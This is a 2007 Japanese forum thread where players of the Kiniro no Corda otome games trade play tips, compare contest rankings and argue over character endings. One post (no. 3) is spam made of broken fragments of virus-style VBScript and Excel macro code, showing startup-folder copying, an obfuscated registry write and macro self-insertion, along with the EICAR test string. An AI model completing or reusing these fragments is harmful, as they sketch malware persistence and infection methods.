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乙女@【金色の】金色のコルダ70【(゚Д゚)ゴルァ!!】

1 :名無しって呼んでいいか?:2007/10/06(土) 01:54:15 ID:???
金色のコルダのゲームについて感想や意見を語るスレッドです。
宣伝購入勧誘は×。商品感想は○。公式や紅玉への意見も○。
面白い・つまらない、好き・嫌い等、感想は自由です。
マターリと意見交換しましょう。sage進行です。

1.キャラ叩き、人叩き、自作自演、決めつけは禁止です。
2.荒らしは華麗にスルーしましょう。
3.テンプレ変更したい人は700前後までに案を出しましょう。
4.スレタイは次スレを立てる人が 乙女@【 】金色のコルダ【 】の【 】部分を自由に決定できます。
 案がある人は930あたりから書いてください。ただし採用されるかはスレ立て人さん次第。
5.次スレは>>970が立てて下さい。無理だった場合は臨機応変に。
6.漫画・アニメ話は該当スレで。
7.攻略質問をする時は、親密度とライバル度、できれば技術・清麗・彩華・愁情レベルも書いて下さい。
 また質問する前に、過去ログ倉庫のログを読んだり、攻略サイトを検索するなり、まず自分で調べましょう。
 特に質問の多い「土浦の励まし」の起こし方等、以下のまとめサイトのQ&Aも参照して下さい。

金色のコルダまとめサイト ttp://music.geocities.jp/corda_1807/
金色のコルダまとめ携帯用 ttp://corda.994.jp/
金色のコルダ2攻略@wiki ttp://www27.atwiki.jp/corda2/
金色のコルダ2アンコール攻略@wiki ttp://www39.atwiki.jp/corda2-encore/

前スレ
乙女@【金色の】金色のコルダ69【(゚Д゚)ゴルァ!!】
http://game12.2ch.net/test/read.cgi/ggirl/1190035366/l50

乙女@金色のコルダ2 アンコール 攻略・ネタバレ5
http://game12.2ch.net/test/read.cgi/ggirl/1191213537/701-800

2 :名無しって呼んでいいか?:2007/10/06(土) 01:54:46 ID:???
コルダ関連スレ

少女漫画板(LaLa連載中の漫画)
☆★金色のコルダ★☆呉由姫 part38
http://anime2.2ch.net/test/read.cgi/gcomic/1191594037/1-100

アニメ2板
金色のコルダ〜primo passo〜 24弦目
http://anime2.2ch.net/test/read.cgi/anime2/1187953918/

難民板(コルダ総合)
金色のコルダ総合 ♯12
http://ex20.2ch.net/test/read.cgi/nanmin/1190297014/801-900

声優板(声優・CD・イベント)
#【案・遙・金】ネオロマンス声優スレ36
http://anime2.2ch.net/test/read.cgi/voice/1187839935/

最悪板
コルダ用絡みスレ5(女向け一般板から派生)
http://tmp6.2ch.net/test/read.cgi/tubo/1186596242/

避難所(総合掲示板) http://jbbs.livedoor.jp/game/8558/
なんでも「金色のコルダ」http://jbbs.livedoor.jp/comic/4068/

3 :名無しって呼んでいいか?:2007/10/06(土) 03:48:49 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :名無しって呼んでいいか?:2007/10/06(土) 07:29:45 ID:???
>>1サン
乙〜〜です。

無印再プレイで絶賛徹夜明け・・・

5 :名無しって呼んでいいか?:2007/10/06(土) 16:41:16 ID:???
>>1乙。

さて、彼氏とスタンプラリー行くかな〜

6 :名無しって呼んでいいか?:2007/10/06(土) 22:34:11 ID:???
>>1 乙です

見てるかわからないけど、>前スレ996
おそらくPSPだよね?
自分はPSP版はわからないけど、
主人公が感傷的なワルツを弾けるかどうかで月森のセリフが変わるから
もしかしたらそうかもしれない

7 :名無しって呼んでいいか?:2007/10/06(土) 22:43:31 ID:???
>>1さん乙
そして前スレ1000GJ!

8 :名無しって呼んでいいか?:2007/10/06(土) 23:06:37 ID:???
前スレ996
「向上心の高さ」1Aの三日後に発生するから、それで間違いない。
PSP版攻略本読む限り「感傷的なワルツ」が引けることが条件とは書いていなかったけど、
>>6も言っているように引ける事が条件なのかも(自分はすんなり埋まったから覚えていないが)。
合奏可能な程度の習熟度でもいいから練習してみてはどうだろう?




9 :名無しって呼んでいいか?:2007/10/06(土) 23:29:36 ID:???
ここに入れて・・・・
土浦君のが欲しいの・・・!

10 :名無しって呼んでいいか?:2007/10/06(土) 23:34:07 ID:???
>>8
ベルを鳴らしてればOKだよ
ベルを鳴らしただけで弾けるとみなされる

11 :名無しって呼んでいいか?:2007/10/06(土) 23:50:43 ID:???
「土浦の励まし」が未だに見られないー!

12 :名無しって呼んでいいか?:2007/10/06(土) 23:58:52 ID:???
俺のをぶち込んでやるよ

13 :名無しって呼んでいいか?:2007/10/07(日) 00:01:29 ID:???
は?何が?

14 :名無しって呼んでいいか?:2007/10/07(日) 00:04:55 ID:???
釣られてるなよゴミクズが

15 :名無しって呼んでいいか?:2007/10/07(日) 00:12:42 ID:???
>>11
>>1

16 :名無しって呼んでいいか?:2007/10/07(日) 00:15:46 ID:???
  

17 :名無しって呼んでいいか?:2007/10/07(日) 00:18:46 ID:???
何よ

18 :名無しって呼んでいいか?:2007/10/07(日) 00:21:08 ID:???
>>6 >>8 >>10
d。
このイベ第一セレ期間中にしか起こしたことないから、
第二セレまで待ってベル鳴らしてからやってみる。

19 :名無しって呼んでいいか?:2007/10/07(日) 01:56:24 ID:???
ランク王国7位キタ━━━━━━(゚∀゚)━━━━━━ !!

20 :名無しって呼んでいいか?:2007/10/07(日) 02:01:35 ID:???
>>19
見てた。理事長就任式の理事だったな。
てっきり学生キャラが来ると思っていたが、餡子でプッシュの理事長とは。

21 :名無しって呼んでいいか?:2007/10/07(日) 02:14:47 ID:???
見てなかった
それにしても7位か。意外だ

22 :名無しって呼んでいいか?:2007/10/07(日) 04:16:35 ID:???
>>11
土浦の禿げ増し?

23 :名無しって呼んでいいか?:2007/10/07(日) 09:14:29 ID:???
>>11
まとめサイト読め

24 :名無しって呼んでいいか?:2007/10/07(日) 11:31:13 ID:???
理事長なぁ・・・2やってたらあれが対象になるのがおかしくてたまらん

25 :名無しって呼んでいいか?:2007/10/07(日) 13:19:31 ID:???
>>21
あれは「ファミ通」ランキングだけどね。
前にどこかの姐さんがそのランキングを貼ってくれたけど、
その時から「ランク王国に来るかな」とは言われていた。

26 :名無しって呼んでいいか?:2007/10/07(日) 14:32:33 ID:???
アンコやってみて、2で見ていない未出の会話を見ようといまプレイ中。

ストーカーのように恋愛状態じゃないメンバーを昼休みつかまえたり、
長々3,4段階でデートで同じ場所行ったりすると、かなりいろんな会話が
聞けるんだね。
フルコンプしていたけど、用語集は気にしてなかったし、ちょっとがんばって
やってみることにしました。


27 :名無しって呼んでいいか?:2007/10/07(日) 15:43:28 ID:???
新たな用語出たら教えてねー

28 :名無しって呼んでいいか?:2007/10/07(日) 18:53:06 ID:???
ドモホルンリンクルのCMで王崎の曲が流れてて思わず振り返った

29 :名無しって呼んでいいか?:2007/10/07(日) 21:21:29 ID:???
ドモホルン…w
まあユーモレスクは養命酒だしなw
ハンガリア聴くとヴァイオリン奏者が納豆かきまわしてるCMとか
ストリングチーズのCM思い出すんだよな…

30 :29:2007/10/07(日) 21:22:38 ID:???
連投スマソ、養命酒は昔のCMのね。

31 :名無しって呼んでいいか?:2007/10/07(日) 21:26:22 ID:???
>>1 乙です

そして7位おめでd

アンコの昼休みイベントで二人verの奴って二段階までしかないのかな?
まだあまり数を見てないのだが、どれも面白くて、おっかけてるキャラが
光っててもついつい複数いる所を選んでしまう…意外な組み合わせも面白い

32 :名無しって呼んでいいか?:2007/10/07(日) 21:29:23 ID:???
アンコの質問ならこっちでよろ

乙女@金色のコルダ2 アンコール 攻略・ネタバレ5
http://game12.2ch.net/test/read.cgi/ggirl/1191213537/

33 :名無しって呼んでいいか?:2007/10/07(日) 21:39:01 ID:???
>>32
ごめん、質問って程ではないつもりだったから失礼した
誘導ありがとう
大人しくしてるよ

34 :名無しって呼んでいいか?:2007/10/08(月) 00:29:38 ID:???
前スレ >>996 のねーさんまだいるかな?
ちょっと試してみたけど、会話の分岐がちょっと違うだけで感傷的なワルツは弾けなくてもおk
音楽室で話しかけると発生するんだけど、どうだろうか。

35 :名無しって呼んでいいか?:2007/10/08(月) 00:55:46 ID:???
>>34
996は発生はしているようだが、思い出に登録されないって話では?
1Aサブに限らず、
発生しても登録されないというイベがあったからその辺りの事を聞いていたと思うのだが。

36 :34:2007/10/08(月) 01:17:11 ID:???
お、そうだったのか。。。意味ないレスしてスマソ。
メモカのデータが移動できるようなら試してみるよ。

37 :34:2007/10/08(月) 02:35:27 ID:???
1Aサブ、試してみた。
ワルツが弾けないと登録されなかったよ……。
1人でわたわたしちゃって本当スマソ。。


38 :前スレ996:2007/10/08(月) 09:06:55 ID:???
>>34-37
データ移動してまで調べてくれた優しい姉さん、本当にありがとう!
時間なくてまだ試せてなかったから、検証してもらえて助かったよ。

39 :名無しって呼んでいいか?:2007/10/08(月) 12:39:07 ID:???
普通に加持の連鎖失敗した。連鎖2まではいってたのにどこでしくじったんだ!
というか股掛けしすぎた自分が悪かったです・・・

40 :名無しって呼んでいいか?:2007/10/08(月) 12:44:47 ID:???
>>39
頑張って!

41 :名無しって呼んでいいか?:2007/10/08(月) 12:47:45 ID:???
パ(ry

>>39
親密度400未満に抑えておかないと通常ルートに行ってしまうぞ

42 :名無しって呼んでいいか?:2007/10/08(月) 18:24:22 ID:???
>>11っす
ご注意の通りにして、見ることが出来ましたあ!ありがとうございました。
しかし、その後の練習が大変だった…

今、土浦と柚木のガチンコイベント中です。狙ってなかったのにキタ−!!
やっぱ無印おもしろいー!
2もシステムは快適だけど、このくらい手間がかかった方が好きかなあ。
それで、ここ来て「見られないー!」なんて言ってりゃ世話無いけど。

43 :名無しって呼んでいいか?:2007/10/08(月) 19:50:36 ID:???
>>41
mjd?!ありがとう助かった。抑えなきゃいけないのか・・・かなりの初期段階で
新密度500越えしてたからなぁ。あぁ400以前にはもう戻れん;;
やりなおすよ

44 :名無しって呼んでいいか?:2007/10/08(月) 19:54:19 ID:???
>>43
質問する前にwiki読みなよ。
ちゃんと書いてあるんだから。

45 :名無しって呼んでいいか?:2007/10/08(月) 21:05:08 ID:???
>>44
気持ちは分かるけど過敏すぎない?質問のつもりだったかも微妙だし

46 :名無しって呼んでいいか?:2007/10/08(月) 21:38:33 ID:???
だね

>>43
加地はアンサンブルで組める曲が多いんで、
その辺注意

47 :名無しって呼んでいいか?:2007/10/08(月) 21:44:50 ID:???
志水はみんながワーワー言ってるときに
一人で黙々と動いててさらっとおいしいところを持ってくタイプだよなあ
・・・と、アンサンブル組んでるうちに恋愛段階がさくさく進んじゃうあたりで思った

48 :名無しって呼んでいいか?:2007/10/09(火) 00:00:21 ID:???
だな。
漫画版から入ったから志水の恋愛EDとか想像つかなかったけど
結構よかった。うまくまとめてくるなぁスタッフ

49 :名無しって呼んでいいか?:2007/10/09(火) 01:06:04 ID:???
>>48
それはたぶん逆w
原作のゲームでは攻略対象の志水を、
呉さんが漫画でうまくまとめられなかっただけ

50 :名無しって呼んでいいか?:2007/10/09(火) 03:02:15 ID:xzFPy8iQ
上手くまとめられないってか、漫画では最初から志水を
恋愛対象にする気がなかっただけでは?

51 :名無しって呼んでいいか?:2007/10/09(火) 03:02:33 ID:???
sageチェックはずれてたゴメン

52 :名無しって呼んでいいか?:2007/10/09(火) 10:07:33 ID:???
何故ここで>>48がアニメや漫画の話をするのかよくわからない
>>47はゲームの話だよな?

漫画の志水は今は香穂子の音楽が気に入ってるという段階だからそれでいいと思うし
ふらっと現れていいところさらっていくというのは実にゲーム通りだw

53 :名無しって呼んでいいか?:2007/10/09(火) 10:47:04 ID:???
>>52
>>48は別にここで話しても良い内容だと思うが…
漫画から入ったからどんな風なのか予想つかなかったけど良かったって、
あくまでゲームで志水を攻略した感想でしょ?
どの媒体からゲームに興味を持ったかくらい話しても構わないと思う
それに>>48はアニメの話なんてしてないじゃん
自分は>>49>>50のレスの方がおかしいと思ったよ

54 :名無しって呼んでいいか?:2007/10/09(火) 10:59:07 ID:???
>>53
そうかなあ、ゲームの話題だったら、スタッフがうまくまとめたとか言わんと思う
>>49>>50もそう受け取ったからそういうレスになったんだろうし

55 :名無しって呼んでいいか?:2007/10/09(火) 11:15:16 ID:???
>>48は普通にゲームの感想だと思ったよ。国語力磨け。



56 :名無しって呼んでいいか?:2007/10/09(火) 11:22:33 ID:???
自分はゲームの感想にはみえなかったなあ…
漫画を原作としたゲームだったらそういう風に受け取ったかもしれないけど、
スタッフがうまくまとめたって言い方は、漫画版より後に作られたものの感想でないと筋が通らない

57 :名無しって呼んでいいか?:2007/10/09(火) 11:24:38 ID:???
筋ってさ、そこまで深く考えなくてもw

58 :名無しって呼んでいいか?:2007/10/09(火) 11:26:43 ID:???
まあ>>48の口が滑ったってことでいいじゃん、
誰しもが常に正しく誰にも誤解ないような言葉を口にするとは限らない
どっちともとれるが、ここは穏便に、ゲースレだからゲームの話だったと解釈しておこう

で、次の話題どうぞ

59 :名無しって呼んでいいか?:2007/10/09(火) 11:27:52 ID:???
>>56

60 :名無しって呼んでいいか?:2007/10/09(火) 11:29:54 ID:???
理事長の目が赤い件

61 :名無しって呼んでいいか?:2007/10/09(火) 11:35:31 ID:???
アニメでは特に志水くっつかないのにアニメの話なわけないじゃんww


62 :名無しって呼んでいいか?:2007/10/09(火) 11:36:56 ID:???
いい加減にやめなさいな。
アンチは巣にお帰り。

63 :名無しって呼んでいいか?:2007/10/09(火) 11:42:37 ID:???
久々に無印ちょっとやって質問

ライバル度って、順位に関係する?
前に、特別曲を4人に出させて、で、そのうちの1人の火原に告白したんだけど、
順位はかなり下だったんだよな…(ちなみに優勝は主人公)
火原だけが逆注目だったから、なのかと思って…関係ないかな?

64 :名無しって呼んでいいか?:2007/10/09(火) 11:47:57 ID:???
>>63
確か、ライバル達には隠しパラメーターとして
「調子」ってのがあった気がして
通ったイベントによってその調子パラメーターが変わるんじゃなかったかな

自分も細かい事は忘れた

65 :名無しって呼んでいいか?:2007/10/09(火) 11:53:12 ID:???
>>64
”調子”だよねえ…
ただ、告白しようとしたりしてるんだし、調子上がってくれてもいいと思ったんだけどね
何なんだろうね調子って

66 :名無しって呼んでいいか?:2007/10/09(火) 11:57:14 ID:???
何か調子上げても
順位上がりやすいキャラとか上がりにくいキャラとかいなかった?
火原って優勝させるのが難しいキャラだった気がするw

反対に月森は最下位にするのが難しいキャラだったw

67 :名無しって呼んでいいか?:2007/10/09(火) 11:59:38 ID:???
火原攻略してるのに
順位低いー順位低いー
たまには優勝した火原が見たいって
かなり前の事だけどこぼしてた姐さん達がいたぞw
それで火原を優勝させるコツみたいなのを伝授してくれた姐さんもいた

火原って「そういうキャラ」なのかもな
変に作り細かいw

68 :名無しって呼んでいいか?:2007/10/09(火) 12:08:03 ID:???
火原は難しいよねw
ライバル度高いイベント起こしても、選択肢によっちゃ調子落ちるし、
逆注目√だと、セレのテーマに関係なく愁情吹くし。
私も火原優勝みたことないなあ。
今度PSP無印買ったらがんがってみようかなw

69 :名無しって呼んでいいか?:2007/10/09(火) 12:36:02 ID:???
最終セレテーマが愁情よりのだったらいいのかな
愁情のって何だっけ?

70 :名無しって呼んでいいか?:2007/10/09(火) 12:46:02 ID:???
>>69
最終セレだけじゃないんだなこれが。
3D起こすと愁情曲吹くんだよ。

71 :名無しって呼んでいいか?:2007/10/09(火) 13:03:01 ID:???
>>70
え、マジ?テーマと関係なく?
つまり3セレあたりでテーマが清麗や彩華でも、3-D起こしていたら3セレで愁情吹くのか?
これは厄介だな…
3セレも愁情になるように仕組むか、3-Dを最終セレになるまで起こさないか

72 :名無しって呼んでいいか?:2007/10/09(火) 13:53:46 ID:???
>>71
逆注目√を素直にやらなくても4E起きるよー。
3B起こして早めに(出来れば3セレ中に)4B起こして、
4Eを最終セレ始めに起こしてから彩華上げてライバル度高めたら火原優勝出来ないかな?
まあこれは今思い付いただけなんで、実際火原優勝させた姐さんから話を聞けたら一番いいが。
てゆうか私もどうやったか知りたいw

73 :名無しって呼んでいいか?:2007/10/09(火) 13:55:03 ID:???
あーそうか、何となく4-Eを狙っていると話しかけて3-Dが起きてしまうことが多くて、
必ず通るような気になっていた
ヴァイオリン壊さなきゃいいかな、いっそ

74 :名無しって呼んでいいか?:2007/10/09(火) 14:12:29 ID:???
無印で盛り上がってる?wという自分も無印再プレイ組。
月森の逆ルート狙いにくい・・・
練習手抜き(?)してセレクションの順位下げるのがなんか悔しいw

75 :名無しって呼んでいいか?:2007/10/09(火) 14:14:10 ID:???
狙いにくいよなほんと…
途中まで練習に集中して一時期だけ下げるという手があるというけど、
その間にライバル度上がりすぎても困るし

76 :名無しって呼んでいいか?:2007/10/09(火) 14:21:47 ID:???
月森に解釈を聴かせないようにしつつ、
各能力が上がりすぎないように
1セレ〜3セレまで違う曲調を選曲しつつ、
セレクションでは3位狙い…という感じだったかなー。
ライバルルートを全員クリアしてから逆注目に挑んだから、
月森と志水はレベルを抑えるのに苦労した記憶がある。

77 :名無しって呼んでいいか?:2007/10/09(火) 14:29:01 ID:???
>>76
あんまりやり込んでない自分が未熟なのかもだけど、セレクションって狙った順位出せるもの??
テーマと違った曲調の曲を楽譜習熟&解釈100にして弾くと3位くらいになる?

78 :名無しって呼んでいいか?:2007/10/09(火) 14:34:36 ID:???
>>77
検証とかはしてないからあくまで参考までに…

曲調はあまり関係なく、重要なのはキーワード。
キーワード合致なし、楽譜&解釈100でやったときはほとんど毎回3位だった。
(逆注目では毎回このパターンでライバル度を抑えてた)

79 :名無しって呼んでいいか?:2007/10/09(火) 15:29:02 ID:???
キーワード合致無しはやったことなかったなー。
大体楽譜習熟度100の、解釈50位で調整しながら狙ってたわ。

月森逆√は完璧日野を目指してるとおこりやすかったよ。
各レベルが平均化するような上げ方をしてた。
そうするとどれかが突出しないから逆√起きやすい、みたいな。
2セレ目からは、前のセレの曲をスーパー化させたので挑んだり。

総合優勝はとりたかったから、2セレで3位とって3D起こして3セレ優勝、
早々4E起こしてフルドーピングしたりw

80 :名無しって呼んでいいか?:2007/10/09(火) 15:47:34 ID:???
PS2無印の攻略Wikiってないんですかね?

プレゼント買ったんだがなかなかあげる会話?にならない…

81 :名無しって呼んでいいか?:2007/10/09(火) 15:49:33 ID:???
>>80
プレゼントは品によって受取る相手が限定されるから、
渡したい相手のプレゼントを持っていないだけじゃない?
ちなみに誰に何を渡したいの?

82 :名無しって呼んでいいか?:2007/10/09(火) 15:50:57 ID:???
>>80
正直、話しかけた時の会話の優先順位がよくわからないときがある
無印のwikiはないけど、仮に作ったとしてもわからないままなんじゃないかなあ

ちなみに、他のイベントが起きたりしている場合、
1時間経過しないとプレゼントは渡せない

83 :名無しって呼んでいいか?:2007/10/09(火) 15:55:55 ID:???
あーあるある。
プレゼントって渡したい時に渡せなかったりしたよ。
全股時とか、親密度上げに余計な時間裂きたくないから手っ取り早くプレゼントで済ませたいのに、
いざプレゼント手に入れて話しかけると、それまで貯まってた分の恋愛趣味イベント起きたり。
お前黒化してるくせに「やっぱり君はかわいいね」とか言わなくていいから茶香炉受け取れよと。

84 :名無しって呼んでいいか?:2007/10/09(火) 16:15:54 ID:???
>>81
月森に靴磨きセットを‥
他のプレゼントは運悪く売ってないようで買ってないです
ちなみにメモスタンドは渡し済み

85 :名無しって呼んでいいか?:2007/10/09(火) 16:19:28 ID:???
靴みがきセットって平日にしか渡せないイメージがある。
イメージってだけだけど。

86 :名無しって呼んでいいか?:2007/10/09(火) 16:20:34 ID:???
ああ、それはあるだろうね、話の流れ上
平日っていうか、学校内って言う方が正しいのかもしれないけど
あくまでイメージだけどな、実際にやってみたわけじゃないから

87 :名無しって呼んでいいか?:2007/10/09(火) 16:38:25 ID:???
でも休日の学校だと体育がない→靴脱がない→靴磨きイラネくないか?w

いや全部イメージでしかないが。

88 :名無しって呼んでいいか?:2007/10/09(火) 16:42:07 ID:???
あの学校上履きないんだっけ?いやよくわからんけど

89 :名無しって呼んでいいか?:2007/10/09(火) 16:44:20 ID:???
上履きも下駄箱もなかったはず

90 :名無しって呼んでいいか?:2007/10/09(火) 16:45:24 ID:???
なるほど、設定細かいな
自分が知らんだけとも言えるが

91 :名無しって呼んでいいか?:2007/10/09(火) 16:46:00 ID:???
>>88
基本脱がないで、体育の時に履き替えるらしい。
エントランスの情報でなんとなく言ってた覚えがある。昇降口がないんだっけ。

92 :名無しって呼んでいいか?:2007/10/09(火) 16:47:44 ID:???
いちいち履き替えてたら香穂子というなのプレーヤーがロードで大変だからな

93 :名無しって呼んでいいか?:2007/10/09(火) 17:41:00 ID:???
とりあえず最後までしたけど、よくわからなかった。

コンクールで最初は優勝したものの、あとは7位ばかり、火原が総合優勝。

どの曲がいいのかもわからず難しかった・・・

負けずに明日も頑張る

94 :名無しって呼んでいいか?:2007/10/09(火) 17:44:17 ID:???
おお、火原を優勝させた猛者が

まあ頑張れー

95 :名無しって呼んでいいか?:2007/10/09(火) 18:25:51 ID:???
>>94
たしかにwwwと思ってしまった。火原の総合優勝なんて見たことないよ
初回プレイなんて覚えてないけど、自分は総合優勝は渡さねぇプレイしかしないや

96 :名無しって呼んでいいか?:2007/10/09(火) 19:38:12 ID:???
姐サン達はどれ位でやり方わかりました?

97 :名無しって呼んでいいか?:2007/10/09(火) 19:53:23 ID:???
自分の場合は初回は惨敗
二回目でコンクール優勝の仕方はわかるようになった
三回目でやっと、とにかく目当てを追いかけまくって曲を聞かせてれば
恋愛は出来ることに気づいた。

そうやって2、3人落とした後に攻略サイト巡って
狙ったイベントを発生させる方法を模索
こんな感じだったな

98 :名無しって呼んでいいか?:2007/10/09(火) 20:26:07 ID:???
初回で目当ての人を落としたが、
段階とかをちゃんと理解できるようになったのは3周くらいしてからかな
全員攻略し終わる頃には優勝も普通にできるようになってきたけど

99 :名無しって呼んでいいか?:2007/10/09(火) 20:50:04 ID:???
火原攻略中なんだけど、テーマ彩華の第一セレで、キーワード2つ
楽譜100解釈100の曲演奏して、主人公2位火原1位だった。
第一セレで負けたの初めてだったからビビったw

100 :名無しって呼んでいいか?:2007/10/09(火) 20:53:53 ID:???
私は逆注目の月森珠玉(4E)だったなぁ。
曲調てのはなんとなく理解できたけど、KWの意味がよくわかってなくて、
1セレでは優勝できたけど、以降は無残な結果だったし。
最終的に攻略本を買って「こんな発生条件だったのか」なんてな。

けど今は全セレ1位の完全優勝ばっかりになっちゃって、
月森や志水・柚木の逆注目が難しく感じるよ。全員特別曲よりも難しい。

101 :名無しって呼んでいいか?:2007/10/09(火) 21:15:52 ID:???
自分は技術あげないで表現ばっかり
BP稼がないで一人で孤独に練習なんて事は
未だによくやるので、志水・柚木の逆注目は難しくないけど
月森の逆注目がなあw

上でも出てるけど、月森を見習って完璧型目指して
全部を均等にあげていくと割りと簡単なんだが
この場合別に無理して練習をしないようにしなくても平気
だって、全部を平均してあげようとしたら単純に時間足りなくて
「何一つ突出したところ無い」能力になりやすいからw
でもドーピングは封印するべし

全てが突出してるタイプを目指して頑張った結果そうなりやすいところが妙に皮肉だ

102 :名無しって呼んでいいか?:2007/10/09(火) 21:44:37 ID:???
ここ読んでると、やっぱ無印ってたのしー

103 :名無しって呼んでいいか?:2007/10/09(火) 21:46:43 ID:???
すべてはそこから始まってるからな

104 :名無しって呼んでいいか?:2007/10/09(火) 22:21:32 ID:???
初プレイは流れに任せてたら柚木珠玉特別曲になった。
何の情報もない頃だったから、EDは必ずムービーあるんだと思ってた。
とゆうか、特別曲というものがあるとは思わず、普通の曲と同じもんだろうと思ってた。
攻略本買って、色々知ってビックリした。
ちなみになんで柚木ライバル√になったかは、合奏にハマったのと、
柚木が黒化して興味沸いたから、柚木と合奏して練習聴かせまくった結果だ。
セレ順位は確か総合優勝出来てた。
慣れないから逆にアホみたいに熱心に練習したからだろう。
ドーピングは、初プレイではしなかった。

思い返すと、なんぞこれ!だな。

105 :名無しって呼んでいいか?:2007/10/09(火) 22:27:53 ID:???
初プレイね
最初から月森ねらいだったけど、
序盤はライバル度低いのばっかで、
終盤はわりと高くなって珠玉EDになったが、
スチルがほとんど埋まらなかったなあ
確かED以外のスチルは4Dくらいだったかも
ちょっとやり直して4Bはとれたかな

106 :名無しって呼んでいいか?:2007/10/09(火) 22:30:56 ID:???
なにが何だかわからなかったから好きな曲を適当に演奏していたら
火原の逆注目に行ってしまい、さらに途中からパラが足りなくなって
リリが出てきておしまいだった。
さらに2回くらいやりなおしてエンディング見たときは嬉しかったなあ・・・

107 :名無しって呼んでいいか?:2007/10/10(水) 03:34:41 ID:???
最初はパラ上げが楽しくってそればっかに熱中したなー
リセットの嵐にも負けず必死で総合優勝したのにすげーあっさりなラストで
「なんだこれ!」と切れかけたところで、乙女ゲームだったことを思い出したリリエンド…
一緒に登下校してくれるなんて三周目で気づいたよw

108 :名無しって呼んでいいか?:2007/10/10(水) 11:10:59 ID:???
>>107
自分もそんな感じ
「スケジュールがタイトすぎるんだよ、恋愛やってる暇ねえー!」
と終わったあとに叫んでしまった
最初はそんなもんだよね?

109 :名無しって呼んでいいか?:2007/10/10(水) 12:27:28 ID:???
パラ上げ以前に用語の意味もさっぱり分からなくて
とりあえず練習してキャラを追いかければいいのかと手探り状態でプレイ
火原の街EDを迎えた

そもそも、コルダに興味を持ったきっかけがEDを見たらageるスレの
「珠玉ED」「街ED」という文字だったんだがw

110 :名無しって呼んでいいか?:2007/10/10(水) 14:46:14 ID:???
加地の「日野さん」が「ヒモパン」に聞こえたorz

111 :名無しって呼んでいいか?:2007/10/10(水) 19:27:42 ID:???
加地の願望乙

112 :名無しって呼んでいいか?:2007/10/11(木) 01:29:09 ID:???
どんだけー

113 :名無しって呼んでいいか?:2007/10/11(木) 15:55:01 ID:???
柚木のブラックがでないような進め方はないのだろうか。
と30分考え込んだ。
なかった

114 :名無しって呼んでいいか?:2007/10/11(木) 22:05:42 ID:???
加地が最萌の自分には、紅玉の演奏者としての加地の努力は報われることは無く
云々のコメントに少々腹が立った
昔、コルダは努力<才能、みたいな書き込みしていた人がいたけれど
本当にちょっとなぁ…

115 :名無しって呼んでいいか?:2007/10/11(木) 22:58:35 ID:???
>>114
もともと加地はそういうキャラとして設定したのだから仕方あるまいよ

個人的には、無印の頃からキャラたちの将来はもう決めていた
ってコメントに驚いた
火原先生も指揮者土浦も無印からの予定どおりとは

116 :名無しって呼んでいいか?:2007/10/11(木) 23:11:10 ID:???
火原の教師はわかる気がするが、
土浦の指揮者はその場で決めた感じがするなぁ。

117 :名無しって呼んでいいか?:2007/10/11(木) 23:16:01 ID:???
>無印の頃からキャラたちの将来はもう決めていた

工エエェェ(´д`)ェェエエ工
無印プレイした後、この先土浦が指揮者目指すなんて想像すらできんかったぞ
火原の先生はそんなに違和感ないけど、土浦は無印でのピアノ弾きのイメージが強くて
未だに指揮者話に馴染めないくらいだよ

加地に関しては、報われる=音楽家として大成するって意味なら
紅玉の言うとおりなんだろうね
でもゲーム中でまた違った方向での幸せを見出すんだからいいのかなって気がしてる

118 :名無しって呼んでいいか?:2007/10/11(木) 23:44:21 ID:???
努力<才能ってのはコルダに限らないからなー
芸術・スポーツ等のジャンルの創作物一般に多い設定
但し、もちろん出来るやつは努力もしてるので、厳密には、
努力する凡才<努力する天才の構図

多分加地に足りなかったのは努力する才能
月森は2で、気がついたらヴァイオリン弾いてて、他の道など考えられない、
余計な不安で弾く手を止めるわけには行かないし、
自信の有無に関わらず、ヴァイオリンを弾いていくしかないと言ってる
それがいいことかどうかはまた別だが、
才能に見切りをつけずにその道に勤しめば結果は違ったかもね

でも、音楽には聴く相手も必要だし、
聴くことに喜び見いだしてるからそれでいいんだろうな

119 :名無しって呼んでいいか?:2007/10/12(金) 00:21:39 ID:???
>118
加地は練習しても才能のある人間の何倍も練習しないと同じレベルになれないから
諦めたんじゃないか?

120 :名無しって呼んでいいか?:2007/10/12(金) 00:49:27 ID:???
加地はすごいいい耳持ってるって設定だし、
オケ部の練習見に行って失敗をすぐ聞き分けたりするイベあったよね。
やっぱ土浦よりこっちに指揮目指させたほうが自然な気がするんだが・・・


121 :名無しって呼んでいいか?:2007/10/12(金) 01:07:38 ID:???
耳がいいからといって指揮者を目指すとは限らないと思う
設定だけ見ると向いてると言えるかもしれないけど、
ゲームをプレイしてみて、加地は性格的にも指揮者を
目指したりはしないと思ったな
音楽へのベクトルが他のキャラと違うからこそ、別の視点
からコルダが見られて面白かった
さすがに土浦のシナリオはいきなりだとは思ったけどね
ただ、無印の頃から「リーダーシップをとるのが得意そう」と
言われている割にはピアノは1人の楽器だし、大勢で何か
するようなエピはサッカーしかなかったから、2で指揮志望が
出てきた時にそれかよ・・・とw

122 :名無しって呼んでいいか?:2007/10/12(金) 01:23:15 ID:???
華のある指揮者っていいと思うけどなあ
性格もマメだし、耳もいいし気を配れるし。
土浦にばかりスーパー設定くっつけないで
加地にも救済策が欲しかったな

123 :名無しって呼んでいいか?:2007/10/12(金) 01:29:01 ID:???
加地は香穂子が居ればどこでも天国だからなあ
普通の子だったら、何か救済策欲しいけど
彼の場合、無くても楽しく生きていきそう

124 :名無しって呼んでいいか?:2007/10/12(金) 01:34:01 ID:???
コンミスばかり見てる指揮者w

